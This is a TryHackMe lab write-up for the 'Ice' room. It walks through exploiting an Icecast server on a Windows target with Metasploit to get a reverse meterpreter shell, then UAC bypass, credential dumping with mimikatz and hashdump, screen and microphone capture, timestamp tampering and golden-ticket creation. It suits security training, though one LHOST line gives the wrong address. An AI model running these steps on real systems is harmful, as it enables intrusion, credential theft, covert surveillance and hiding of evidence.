DEATHESTHER
← All write-ups

TRYHACKME WRITE-UP

Ice - TryHackMe writeup

Deploy & hack into a Windows machine, exploiting a very poorly secured media server

EasyWindowsCVE-2017-0143XSSBuffer overflowSMB12 min read

Open the room on TryHackMe ↗ View on GitHub

Task 1. Connect

You are now ready to use our machines on our network!

No answer needed

Now when you deploy material, you will see an internal IP address of your Virtual Machine.

No answer needed

Task 2. Recon

Let make a Nmap scan to identify running services

death@esther:~$ nmap 10.10.203.69 -sV -Pn -A --script=vuln -T 4
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-06 09:07 IST
Nmap scan report for 10.10.203.69
Host is up (0.15s latency).
Not shown: 988 closed tcp ports (conn-refused)
PORT      STATE SERVICE            VERSION
135/tcp   open  msrpc              Microsoft Windows RPC
139/tcp   open  netbios-ssn        Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds       Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
3389/tcp  open  ssl/ms-wbt-server?
|_ssl-ccs-injection: No reply from server (TIMEOUT)
5357/tcp  open  http               Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-csrf: Couldn't find any CSRF vulnerabilities.
8000/tcp  open  http               Icecast streaming media server
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-vuln-cve2014-3704: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
49152/tcp open  msrpc              Microsoft Windows RPC
49153/tcp open  msrpc              Microsoft Windows RPC
49154/tcp open  msrpc              Microsoft Windows RPC
49158/tcp open  msrpc              Microsoft Windows RPC
49159/tcp open  msrpc              Microsoft Windows RPC
49160/tcp open  msrpc              Microsoft Windows RPC
Service Info: Host: DARK-PC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 806.12 seconds

According to scan results:

Task 3. Gain Access

As the IceCast media server is present let search of any vulnerability.

In IceCast server a CVE-2004-1561 is present.

Let exploit using Msfconsole.

This is the exploit exploit/windows/http/icecast_header we were going to use.

Let configure this Exploit to gain Shell.

set RHOSTS <Target IP>
set LHOST <Target IP>

So it time to Run Exploit

run

We got the meterpreter Shell

Task 4. Escalate

Let get the user id using command

getuid

Let take a view at system info.

sysinfo

Let run a post module of recon to get more way to exploit this system.

run post/multi/recon/local_exploit_suggester
exploit/windows/local/bypassuac_eventvwr

oh sry my machine got expired

Now we have an exploit let backgound this session using

ctrl + z

But before running use command back to back from previous exploit

back

So, let run the exploit we found.

use exploit/windows/local/bypassuac_eventvwr

Now let see options this exploit

show options

We need to change the LHOST and Set the Sessions

set LHOST 10.17.120.99
set session 1
run

The exploit ran successfully.

Let check permission listed allows us to take ownership of files?

getprivs

SeTakeOwnershipPrivilege allow us to take ownership.

Task 5. Looting

Let list the process uisng command:

ps

We were going to migrate the process run by admin.

migrate -N spoolsv.exe

After migratre check for uid, as we sucessfully migrated and we are noW NT AUTHORITY.

Let loot the site

load kiwi

We can use help command to get help of kiwi.

So first we going to Retrieve all credentials.

creds_all

Task 6. Post-Exploitation

Let dump all the passwords.

hashdump

We can also share the screen of target using

screenshare

We can even record from a microphone attached to the system using command.

record_mic

To complicate forensics efforts we can modify timestamps of files on the system. What command allows us to do this?

timestomp

Mimikatz allows us to create what's called a golden ticket, allowing us to authenticate anywhere with ease. What command allows us to do this?

golden_ticket_create

Thankyou 😄